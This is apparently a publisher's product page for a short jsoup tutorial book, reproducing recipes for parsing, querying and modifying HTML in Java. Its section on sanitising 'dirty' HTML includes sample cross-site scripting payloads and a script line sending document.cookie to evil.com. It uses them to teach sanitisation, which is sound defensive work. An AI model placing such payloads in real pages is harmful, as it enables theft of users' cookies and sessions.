Search icon
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletters
Free Learning
Arrow right icon
Instant jsoup How-to
Instant jsoup How-to

Instant jsoup How-to: Effectively extract and manipulate HTML content with the jsoup library

By Pete Houston
€15.99 €10.99
Book Jun 2013 38 pages 1st Edition
eBook
€15.99 €10.99
Print
€19.99
Subscription
€14.99 Monthly
eBook
€15.99 €10.99
Print
€19.99
Subscription
€14.99 Monthly

What do you get with eBook?

Product feature icon Instant access to your Digital eBook purchase
Product feature icon Download this book in EPUB and PDF formats
Product feature icon Access this title in our online reader with advanced features
Product feature icon DRM FREE - Read whenever, wherever and however you want
Buy Now

Product Details


Publication date : Jun 7, 2013
Length 38 pages
Edition : 1st Edition
Language : English
ISBN-13 : 9781782167990
Category :
Table of content icon View table of contents Preview book icon Preview Book

Instant jsoup How-to

Chapter 1. Instant Jsoup How-to

Welcome to Instant Jsoup How-to. As you look around, you will see that many websites and services provide information through RSS, Atom, or even through a web service API; however, lots of sites don't provide such facilities. That is the reason why many HTML parsers arise to support the ability of web scraping. Jsoup, one among the popular HTML parsers for Java developers, stands as a powerful framework that gives developers an easy way to extract and transform HTML content. This book is therefore written with all the recipes that are needed to grab web information.

Giving input for parser (Must know)


HTML data for parsing can be stored in different types of sources such as local file, a string, or a URI. Let's have a look at how we can handle these types of input for parsing using Jsoup.

How to do it...

  1. Create the Document class structure from Jsoup, depending on the type of input.

    • If the input is a string, use:

      String html = "<html><head><title>jsoup: input with string</title></head><body>Such an easy task.</body></html>";
      Document doc = Jsoup.parse(html);
    • If the input is from a file, use:

      try {
      File file = new File("index.html");
      Document doc = Jsoup.parse(file, "utf-8");
      } catch (IOException ioEx) {
          ioEx.printStackTrace();
      }
    • If the input is from a URL, use:

      Document doc = Jsoup.connect("http://www.example.com").get();
  2. Include the correct package at the top.

    import org.jsoup.Jsoup;
    import.jsoup.nodes.Document;

Note

The complete example source code for this section is in \source\Section01.

The API reference for this section is available at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html

How it works...

Basically, all the inputs will be given to the Jsoup class to parse.

For an HTML string, you just need to pass the HTML string as parameter for the method Jsoup.parse().

For an HTML file, there are three parameters inputted for Jsoup.parse(). The first one is the file object, which points to the specified HTML file; the second one is the character set of the file. There is an overload of this method with an additional third parameter, Jsoup.parse(File file, String charsetName, String baseUri). The baseUri URL is the URL from where the HTML file is retrieved; it is used to resolve relative paths or links.

For a URL, you need to use the Jsoup.connect() method. Once the connection succeeds, it will return an object, thus implementing the connection interface. Through this, you can easily get the content of the URL page using the Connection.get() method.

The previous example is pretty easy and straightforward. The results of parsing from the Jsoup class will return a Document object, which represents a DOM structure of an HTML page, where the root node starts from <html>.

There's more...

Besides receiving the well-formed HTML as input, Jsoup library also supports input as a body fragment. This can be seen at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html#parseBodyFragment(java.lang.String)

Tip

Downloading the example code

You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.

Extracting data using DOM (Must know)


As the input is ready for extraction, we will begin with HTML parsing using the DOM method.

Note

If you don't know what DOM is, you can have a quick start with the DOM tutorial at:

http://www.w3schools.com/htmldom/

Let's move on to the details of how it works in Jsoup.

Getting ready

This section will parse the content of the page at, http://jsoup.org.

The index.html file in the project is provided if you want to have a file as input, instead of connecting to the URL.

How to do it...

The following screenshot shows the page that is going to be parsed:

By viewing the source code for this HTML page, we know the site structure.

The Jsoup library is quite supportive of the DOM navigation method; it provides ways to find elements and extract their contents efficiently.

  1. Create the Document class structure by connecting to the URL.

    Document doc = Jsoup.connect("http://jsoup.org").get();
  2. Navigate to the menu tag whose class is nav-sections.

    Elements navDivTag = doc.getElementsByClass("nav-sections");
  3. Get the list of all menu tags that are owned by <a>.

    Elements list = navDivTag.get(0).getElementsByTag("a");
  4. Extract content from each Element class in the previous menu list.

    for(Element menu: list) {
    System.out.print(String.format("[%s]", menu.html()));
    }

The output should look like the following screenshot after running the code:

The complete example source code for this section is placed at \source\Section02.

Note

The API reference for this section is available at:

http://jsoup.org/apidocs/org/jsoup/nodes/Element.html

How it works...

Let's have a look at the navigation structure:

html > body.n1-home > div.wrap > div.header > div.nav-sections > ul > li.n1-news > a

The div class="nav-sections" tag is the parent of the navigation section, so by using getElementsByClass("nav-sections"), it will move to this tag. Since there is only one tag with this class value in this example, we only need to extract the first found element; we will get it at index 0 (first item of results).

Elements navDivTag = doc.getElementsByClass("nav-sections");

The Elements object in Jsoup represents a collection (Collection<>) or a list (List<>); therefore, you can easily iterate through this object to get each element, which is known as an Element object.

When at a parent tag, there are several ways to get to the children. Navigate from subtag <ul>, and deeper to each <li> tag, and then to the <a> tag. Or, you can directly make a query to find all the <a> tags. That's how we retrieved the list that we found, as shown in the following code:

Elements list = navDivTag.get(0).getElementsByTag("a");

The final part is to print the extracted HTML content of each <a> tag.

Beware of the list value; even if the navigation fails to find any element, it is always not null, and therefore, it is good practice to check the size of the list before doing any other task.

Additionally, the Element.html() method is used to return the HTML content of a tag.

There's more...

Jsoup is quite a powerful library for DOM navigation. Besides the following mentioned methods, the other navigation types to find and extract elements are also supported in the Element class. The following are the common methods for DOM navigation:

Methods

Descriptions

getElementById(String id)

Finds an element by ID, including its children.

getElementsByTag(String c)

Finds elements, including and recursively under the element that calls this method, with the specified tag name (in this case, c).

getElementsByClass(String className)

Finds elements that have this class, including or under the element that calls this method. Case insensitive.

getElementsByAttribute(String key)

Find elements that have a named attribute set. Case insensitive.

This method has several relatives, such as:

  • getElementsByAttributeStarting(String keyPrefix)

  • getElementsByAttributeValue(String key, String value)

  • getElementsByAttributeValueNot(String key, String value)

getElementsMatchingText(Pattern pattern)

Finds elements whose text matches the supplied regular expression.

getAllElements()

Finds all elements under the specified element (including self and children of children).

There is a need to mention all methods that are used to extract content from an HTML element. The following table shows the common methods for extracting elements:

Methods

Descriptions

id()

This retrieves the ID value of an element.

className()

This retrieves the class name value of an element.

attr(String key)

This gets the value of a specific attribute.

attributes()

This is used to retrieve all the attributes.

html()

This is used to retrieve the inner HTML value of an element.

data()

This is used to retrieve the data content, usually applied for getting content from the <script> and <style> tags.

text()

This is used to retrieve the text content.

This method will return the combined text of all inner children and removes all HTML tags, while the html() method returns everything between its open and closed tags.

tag()

This retrieves the tag of the element.

The following code will print the correspondent relative path of each <a> tag found in the menu list to demonstrate the use of the attr()method to get attribute content.

System.out.println("\nMenu and its relative path:");
for(Element menu: list) {
  System.out.println(String.format("[%s] href = %s", menu.html(), menu.attr("href")));
}

Extracting data using CSS selector (Must know)


Instead of using DOM navigation, the CSS selector method is used. Basically, the CSS selector is the way to identify the element based on how it is styled in CSS. Let's see how this works.

Getting ready

If you don't know the CSS selector syntax yet, I suggest finding some tutorials or guidelines to learn about it first.

Note

The following two links will be helpful for you to learn about CSS selector syntax:

How to do it...

Now we will try to use CSS selector syntax to do the same task that DOM navigation does. Basically, it is the same code as in the previous recipe but is a little different in the way we parse the content.

  1. Create the Document class structure by loading the URL:

    Document doc = Jsoup.connect(mUrl).get();
  2. Select the <div> tag with the class attribute nav-sections:

    Elements navDivTag = doc.select("div.nav-sections");
  3. Select all the <a> tags:

    Elements list = navDivTag.select("a");
  4. Retrieve the results from the list:

    for(Element menu: list) {
        System.out.print(String.format("[%s]", menu.html()));
    }

As you try to execute this code, it will produce the same result as the previous recipe by using DOM navigation.

The complete example source code for this section is available at \source\Section03.

How it works...

It works like a charm! Well, there is actually no magic here. It's just that the selector query will give the direction to the target elements and Jsoup will find it for you. The select() method is written for this task so that you don't have to care a lot about it.

Through the query doc.select("div.nav-sections"), the Document class will try to find and return all the <div> tags that have class name equal to nav-sections.

It is even simpler when trying to find the children; Jsoup will look up every child and their children to find the tags that match the selector. That's how all the <a> tags are selected in step 3. Compared to DOM navigation, it is much simpler to use and easier to understand. Developers should know HTML page structure in order to use the CSS selector query.

There's more...

Please refer to the following pages for the usage of all CSS selector syntax to use in your application:

Transforming HTML elements (Must know)


Basically, an HTML parser does two things—extraction and transformation. While the extraction is described in previous recipes, this recipe is going to talk about transformation or modification.

How to do it...

In this section, I'm going to show you how to use Jsoup library to modify the following HTML page:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  </body>
</html>

Into this result we are adding some minor changes:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
    <meta charset="utf-8" />
  </head>
  <body class=" content">
    <h1>Jsoup: the HTML parser</h1>
    <p align="center">Author: Johnathan Hedley</p>
    <p>It is a very powerful HTML parser! I love it so much...</p>
  </body>
</html>

Perform the following tasks:

  • Add a <meta> tag to <head>

  • Add a <p> tag for body content description

  • Add a <p> tag for body content author

  • Add an attribute to the <p> tag of the author

  • Add the class for the <body> tag

The previous tasks will be implemented in the following way:

  1. Add a <meta> tag to <head>.

    Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
    doc.head().appendChild(tagMetaCharset);
  2. Add a <p> tag for body content description.

    Element tagPDescription = new Element(Tag.valueOf("p"), "");
    tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
    doc.body().appendChild(tagPDescription);
  3. Add a <p> tag for body content author.

    tagPDescription.before("<p>Author: Johnathan Hedley</p>");
  4. Add an attribute to the <p> tag of the author.

    Element tagPAuthor = doc.body().select("p:contains(Author)").first();
    tagPAuthor.attr("align", "center");
  5. Add a class for the <body> tag.

    doc.body().addClass("content");

The complete example source code for this section is available at \source\Section04.

How it works...

As you see, the <meta> tag doesn't exist, so we need to create a new Element that represents the <meta> tag.

Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
tagMetaCharset.attr("charset", "utf-8");

The constructor of the Element object requires two parameters; one is the Tag object, and the other one is the base URI of the element. Usually, the base URI when creating the Tag object is an empty string, which means you can add the base URI when you want to specify where this Tag object should belong. One thing worth remembering is that the Tag class doesn't have a constructor and developers need to create it through the static method Tag.valueOf(String tagName) in order to create a Tag object.

In the next line, the attr(String key, String value) method is used to set the attribute value, where key is the name of the attribute.

doc.head().appendChild(tagMetaCharset);

Instead of looking up the <head> or <body> tag, Jsoup already provides two methods to get these two elements directly, which makes it very convenient to append a new child to the <head> tag. If you want to insert the <meta> tag before <title>, you can use the prependchild() method instead. The call to appendChild() will add a new element at the end of the list, while prependChild() will add a new element as the first child of the list.

Element tagPDescription = new Element(Tag.valueOf("p"), "");
  tagPDescription.text("It is a very powerful HTML parser! I love it so much...");

doc.body().appendChild(tagPDescription);

The second task is performed by the same code, basically.

Sometimes, you may find it too complicated to create objects and add to the parents; Jsoup provides support for the adding of objects to the HTML string the other way around.

tagPDescription.before("<p>Author: Johnathan Hedley</p>");

The third task is done by directly adding an HTML string as a sibling of the previous <p> tag. The before(Node node) method is similar to prependChild(Node node) but applied for inserting siblings.

The next task is to add the align=center attribute to the author <p> tag that we've just added. Up to this point, you may have learned various ways to navigate to this tag; well, I choose one easy way to achieve the task, that is, making a CSS selector get to the first <p> tag that contains the text Author in its HTML content.

Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");

The previous line performs a pseudo selector to demonstrate, and we add the attribute to it.

The final task can easily be achieved by using the addClass(String classname) method:

doc.body().addClass("content");

If you try to add an already existing class name, it won't add because Jsoup is smart enough to ensure that a class name only appears once in an element.

There's more...

What you previously saw is just a demonstration of the Jsoup library's capabilities in manipulating HTML elements contents through some common methods.

You will find more useful and convenient methods while working with Jsoup through its API reference page.

Miscellaneous Jsoup options (Should know)


Usually, developers only work on Jsoup with default options, unaware that it provides various useful options. This recipe will acquaint you with some common-use options.

How to do it...

  1. How to work with connection objects:

    • Setting userAgent: It is very important to always specify userAgent when sending HTTP requests. What if the web page displays some information differently on different browsers? The result of parsing might be different.

      Document doc = Jsoup.connect(url).userAgent("Mozilla/5.0 (Windows NT 6.1)").get();

    Especially when using Jsoup in Android, you must always specify a user agent; otherwise, it won't work properly.

    • When forced to work with different content types:

      Document doc = Jsoup.connect(url).ignoreContentType(true).get();

    By default, Jsoup only allows working with HTML and XML content type and throws exceptions for others. So, you will need to specify this properly in order to work with other content types, such as RSS, Atom, and so on.

    • Configure a connection timeout:

      Document doc = Jsoup.connect(url).timeout(5000).get();

    The default timeout for Jsoup is 3000 milliseconds (three seconds). Zero indicates an infinite timeout.

    • Add a parameter request to the connection:

      Document doc = Jsoup.connect(url).data("author", "Pete Houston").get();

    In dynamic web, you need to specify a parameter to make a request; the data() method works for this purpose.

    Note

    Please refer to the following link for more information:

    http://jsoup.org/apidocs/org/jsoup/Connection.html#data(java.lang.String, java.lang.String)

    • Sometimes, the request is post.

      Document doc = Jsoup.connect(url).data("author", "Pete Houston").post();
  2. Setting the HTML output of the Document class.

    This option works through the Document.OutputSettings class.

    Note

    Please refer to the following link for more information:

    http://jsoup.org/apidocs/org/jsoup/nodes/Document.OutputSettings.html

    This class outputs HTML text in a neat format with the following options:

    • Character set: Get/set document charset

    • Escape mode: Get/set escape mode of HTML output

    • Indentation: Get/set indent amount for pretty printing (by space count)

    • Outline: Enable/disable HTML outline mode

    • Pretty print: Enable/disable pretty printing mode

    For example, display the HTML output with; charset as utf-8 and the indentation amount as four spaces, enable the HTML outline mode, and enable pretty printing:

    Document.OutputSettings settings = new Document.OutputSettings();
    settings.charset("utf-8").indentAmount(4).outline(true).prettyPrint(true);
    Document doc = …// create DOM object somewhere.doc.outputSettings(settings);
    System.out.println(doc.html());

    After setting the output format to Document, the content of Document is processed into the according format; call the Document.html()method for output result.

  3. Configure the parser type.

    Jsoup provides two parser types: HTML parser and XML parser.

    By default, it uses HTML parser. However, if you are going to parse XML such as RSS or Atom, you should change the parser type to XML parser or it will not work properly.

    Document doc = Jsoup.connect(url).parser(Parser.xmlParser()).get();

There's more...

The previously mentioned options in Jsoup are important ones that the developers should know and make use of.

However, there are several more that you can try:

Cleaning dirty HTML documents (Become an expert)


HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.

Getting ready

If you've never heard about XSS before, I suggest you learn more about it to follow this section.

How to do it...

Our task in this section is to clean the buggy, XSSed HTML:

<html>
  <head>
  <title>Section 05: Clean dirty HTML</title>
  <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');">
  <meta charset="utf-8" />
  </head>

  <body onload=alert('XSS02')>
    <h1>Jsoup: the HTML parser</h1>
    <scriptsrc=http://ha.ckers.org/xss.js></script>
    <img """><script>alert("XSS03")</script>">
    <imgsrc=# onmouseover="alert('xxs04')">
    <script/XSSsrc="http://ha.ckers.org/xss.js"></script>
    <script/src="http://ha.ckers.org/xss.js"></script>
    <iframesrc="javascript:alert('XSS05');"></iframe>
    <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" />
    <imgsrc="www.w3.org/html/logo/img/mark-only-icon.png" />
  </body>
</html>

If you open this file in the Chrome or Firefox browser, you will see the XSS. Just imagine that if users open this XSSed HTML and are redirected to a page that hackers have total control over, the hackers could, for example, steal users' cookies, which is very dangerous.

<img """>
<script>
document.location = 'http://evil.com/steal.php?cookie=' + document.cookie;
</script>">

There are thousand ways for XSS attacks to occur, so you should avoid and clean it; it's time for Jsoup to do its job.

  1. Load the Document class structure.

    File file = new File("index.html");
    Document doc = Jsoup.parse(file, "utf-8");
  2. Create a whitelist.

    Whitelist allowList = Whitelist.relaxed();
  3. Add more allowed tags and attributes.

    allowList
      .addTags("meta", "title", "script", "iframe")
      .addAttributes("meta", "charset")
      .addAttributes("iframe", "src")
      .addProtocols("iframe", "src", "http", "https");
  4. Create Cleaner, which will do the cleaning task.

    Cleaner cleaner = new Cleaner(allowList);
  5. Clean the dirty HTML.

    Document newDoc = cleaner.clean(doc);
  6. Print the new clean HTML.

    System.out.println(newDoc.html());

This is the result of the cleaning:

<html>
  <head>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  <script>
  </script>
  <img />
  <script>
  </script>&quot;&gt;
  <img />
  <script>
  </script>
  <script>
  </script>
  <iframe>
  </iframe>
  <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" />
  <img />
  </body>
</html>

Indeed, the resulting HTML is very clean and there is almost no script at all.

The complete example source code for this section is available at \source\Section05.

How it works...

The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow them in the result parse tree. These allowed tags are defined in Whitelist.

  Whitelist allowList = Whitelist.relaxed();
  allowList
  .addTags("meta", "title", "script", "iframe")
  .addAttributes("meta", "charset")
  .addAttributes("iframe", "src")
  .addProtocols("iframe", "src", "http", "https");

Here we define Whitelist, which is created through the relaxed() method and contains the following tags:

a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

If you want to add more tags, use the method addTags(String… tags). As you can see, the list of tags created through relaxed()doesn't have <meta>, <title>, <script>, and <iframe>, so I added them to the list manually by using addTags().

If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.

One special attribute is src, which contains a URL to a file, and it's always a good practice to give a protocol to prevent inline scripting XSS. Consider the previous bug HTML line:

<iframesrc="javascript:alert('XSS05');">
</iframe>

The attribute "src" is supposed to refer to a URL but it actually does not. The fix is to ensure the "src" value is acquired through HTTP or HTTPS. That is what the following line means:

  .addProtocols("iframe", "src", "http", "https");

You can write in chain while adding tags or attributes.

While Whitelist provides the safe tag list, Cleaner, on the other hand, takes Whitelist as input to clean the input HTML:

  Cleaner cleaner = new Cleaner(allowList);
  Document newDoc = cleaner.clean(doc);

The new Document class is created after cleaning is done.

There's more...

Cleaner only keeps the allowed HTML tags provided by Whitelist input; everything else is removed.

For convenience, Jsoup supports the following five predefined white-lists:

  • none(): This allows only text nodes, all HTML will be stripped

  • simpleText(): This allows only simple text formatting, such as b, em, i, strong, and u

  • basic(): This allows a fuller range of text nodes, such as a, b, blockquote, br, cite, code, dd, dl, dt, em, i, li, ol, p, pre, q, small, strike, strong, sub, sup, u, and ul, and appropriate attributes

  • basicWithImages(): This allows the same text tags such as basic() and also allows the img tags, with appropriate attributes, with src pointing to http or https

  • relaxed(): This allows a full range of text and structural body HTML tags, such as a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

Tags removed in <head>

If you pay more attention, you can see that everything inside the <head> tag is removed, even when you allow them in the whitelist as shown in the previous code.

Note

The current version of Jsoup is 1.7.2; please look up GitHub, lines 45 and 46, at the following location:

https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45

The cleaner keeps and parses only <body>, not <head> as shown in the following code snippet:

  if (dirtyDocument.body() != null) 
  copySafeNodes(dirtyDocument.body(), clean.body());

So, if you want to clean the <head> tag instead of removing everything, get the code, modify it, and build your own package. Add the following two lines:

if (dirtyDocument.head() != null) 
copySafeNodes(dirtyDocument.head(), clean.head());

Listing all URLs within an HTML page (Should know)


We are one step closer to data crawling techniques, and this recipe is going to give you an idea on how to parse all the URLs within an HTML document.

How to do it...

In this task, we are going to parse all links in, http://jsoup.org.

  1. Load the Document class structure from the page.

    Document doc = Jsoup.connect(URL_SOURCE).get();
  2. Select all the URLs in the page.

    Elements links = doc.select("a[href]");
  3. Output the results.

    for(Element url: links) {
    System.out.println(String.format("* [%s] : %s ", url.text(),  url.attr("abs:href")));
        }

The complete example source code for this section is available at \source\Section06.

How it works...

Up to this point, I think you're already familiar with CSS selector and know how to extract contents from a tag/node.

The sample code will select all <a> tags with an href attribute and print the output:

System.out.println(String.format("* [%s] : %s ", url.text(), url.attr("abs:href")));

If you simply print the attribute value like url.attr("href"), the output will print exactly like the HTML source, which means some links are relative and not all are absolute. The meaning of abs:href here is to give a resolution for the absolute URL.

There's more...

In HTML, the <a> tag is not the only one that contains a URL, there are other tags also, such as <img>, <script>, <iframe>, and so on. So how are we going to get their links?

If you pay attention to these tags, you can see that they have the same common attribute, src. So the task is quite simple: retrieve all tags containing the src attribute inside:

  Element results = doc.select("[src]");

Note

The following is a very good link listing from the Jsoup author:

http://jsoup.org/cookbook/extracting-data/example-list-links

Listing all images within an HTML page (Should know)


Another well-known example of data parsing tasks nowadays is image crawling. Let's try to do it with Jsoup parser.

How to do it...

In this task, we're going to parse a few images from, http://www.packtpub.com/.

  1. Load the Document class structure from the page.

    Document doc = Jsoup.connect(URL_SOURCE).get();
  2. Select the images.

    Elements links = doc.select("img[src]");
  3. Output the results.

    for(Element url: links) {
    System.out.println("* " + url.attr("abs:src"));
    }

The complete example source code for this section is available at \source\Section07.

How it works...

In HTML, the images are usually put under the <img> tag, so the selector to query these images is img[src]:

Elements links = doc.select("img[src]");

However, if the image is defined as a CSS attribute, it is out of the Jsoup role,which is used purely to parse the HTML result.

Left arrow icon Right arrow icon

Key benefits

  • Learn something new in an Instant! A short, fast, focused guide delivering immediate results
  • Manipulate real-world HTML
  • Discover all the features supported by the Jsoup library
  • Learn how to Extract and Validate HTML data

Description

As you might know, there are a lot of Java libraries that support parsing HTML content out there. Jsoup is yet another HTML parsing library, but it provides a lot of functionalities and boasts much more interesting features when compared to others. Give it a try, and you will see the difference! Instant jsoup How-to provides simple and detailed instructions on how to use the Jsoup library to manipulate HTML content to suit your needs. You will learn the basic aspects of data crawling, as well as the various concepts of Jsoup so you can make the best use of the library to achieve your goals. Instant jsoup How-to will help you learn step-by-step using real-world, practical problems. You will begin by learning several basic topics, such as getting input from a URL, a file, or a string, as well as making use of DOM navigation to search for data. You will then move on to some advanced topics like how to use the CSS selector and how to clean dirty HTML data. HTML data is not always safe, and because of that, you will learn how to sanitize the dirty documents to prevent further XSS attacks. Instant jsoup How-to is a book for every Java developer who wants to learn HTML manipulation quickly and effectively. This book includes the sample source code for you to refer to with a detailed explanation of every feature of the library.

What you will learn

Parse HTML from a URL, a file, or a string Find data using DOM or CSS selectors Manipulate the HTML elements, attributes, and text Sanitize data to prevent XSS attacks Understand various methods to configure your library for better results

What do you get with eBook?

Product feature icon Instant access to your Digital eBook purchase
Product feature icon Download this book in EPUB and PDF formats
Product feature icon Access this title in our online reader with advanced features
Product feature icon DRM FREE - Read whenever, wherever and however you want
Buy Now

Product Details


Publication date : Jun 7, 2013
Length 38 pages
Edition : 1st Edition
Language : English
ISBN-13 : 9781782167990
Category :

Table of Contents

7 Chapters
Instant Jsoup How-to Chevron down icon Chevron up icon
Credits Chevron down icon Chevron up icon
About the Author Chevron down icon Chevron up icon
About the Reviewers Chevron down icon Chevron up icon
www.PacktPub.com Chevron down icon Chevron up icon
Preface Chevron down icon Chevron up icon
Instant Jsoup How-to Chevron down icon Chevron up icon

Customer reviews

Filter icon Filter
Top Reviews
Rating distribution
Empty star icon Empty star icon Empty star icon Empty star icon Empty star icon 0
(0 Ratings)
5 star 0%
4 star 0%
3 star 0%
2 star 0%
1 star 0%

Filter reviews by


No reviews found
Get free access to Packt library with over 7500+ books and video courses for 7 days!
Start Free Trial

FAQs

How do I buy and download an eBook? Chevron down icon Chevron up icon

Where there is an eBook version of a title available, you can buy it from the book details for that title. Add either the standalone eBook or the eBook and print book bundle to your shopping cart. Your eBook will show in your cart as a product on its own. After completing checkout and payment in the normal way, you will receive your receipt on the screen containing a link to a personalised PDF download file. This link will remain active for 30 days. You can download backup copies of the file by logging in to your account at any time.

If you already have Adobe reader installed, then clicking on the link will download and open the PDF file directly. If you don't, then save the PDF file on your machine and download the Reader to view it.

Please Note: Packt eBooks are non-returnable and non-refundable.

Packt eBook and Licensing When you buy an eBook from Packt Publishing, completing your purchase means you accept the terms of our licence agreement. Please read the full text of the agreement. In it we have tried to balance the need for the ebook to be usable for you the reader with our needs to protect the rights of us as Publishers and of our authors. In summary, the agreement says:

  • You may make copies of your eBook for your own use onto any machine
  • You may not pass copies of the eBook on to anyone else
How can I make a purchase on your website? Chevron down icon Chevron up icon

If you want to purchase a video course, eBook or Bundle (Print+eBook) please follow below steps:

  1. Register on our website using your email address and the password.
  2. Search for the title by name or ISBN using the search option.
  3. Select the title you want to purchase.
  4. Choose the format you wish to purchase the title in; if you order the Print Book, you get a free eBook copy of the same title. 
  5. Proceed with the checkout process (payment to be made using Credit Card, Debit Cart, or PayPal)
Where can I access support around an eBook? Chevron down icon Chevron up icon
  • If you experience a problem with using or installing Adobe Reader, the contact Adobe directly.
  • To view the errata for the book, see www.packtpub.com/support and view the pages for the title you have.
  • To view your account details or to download a new copy of the book go to www.packtpub.com/account
  • To contact us directly if a problem is not resolved, use www.packtpub.com/contact-us
What eBook formats do Packt support? Chevron down icon Chevron up icon

Our eBooks are currently available in a variety of formats such as PDF and ePubs. In the future, this may well change with trends and development in technology, but please note that our PDFs are not Adobe eBook Reader format, which has greater restrictions on security.

You will need to use Adobe Reader v9 or later in order to read Packt's PDF eBooks.

What are the benefits of eBooks? Chevron down icon Chevron up icon
  • You can get the information you need immediately
  • You can easily take them with you on a laptop
  • You can download them an unlimited number of times
  • You can print them out
  • They are copy-paste enabled
  • They are searchable
  • There is no password protection
  • They are lower price than print
  • They save resources and space
What is an eBook? Chevron down icon Chevron up icon

Packt eBooks are a complete electronic version of the print edition, available in PDF and ePub formats. Every piece of content down to the page numbering is the same. Because we save the costs of printing and shipping the book to you, we are able to offer eBooks at a lower cost than print editions.

When you have purchased an eBook, simply login to your account and click on the link in Your Download Area. We recommend you saving the file to your hard drive before opening it.

For optimal viewing of our eBooks, we recommend you download and install the free Adobe Reader version 9.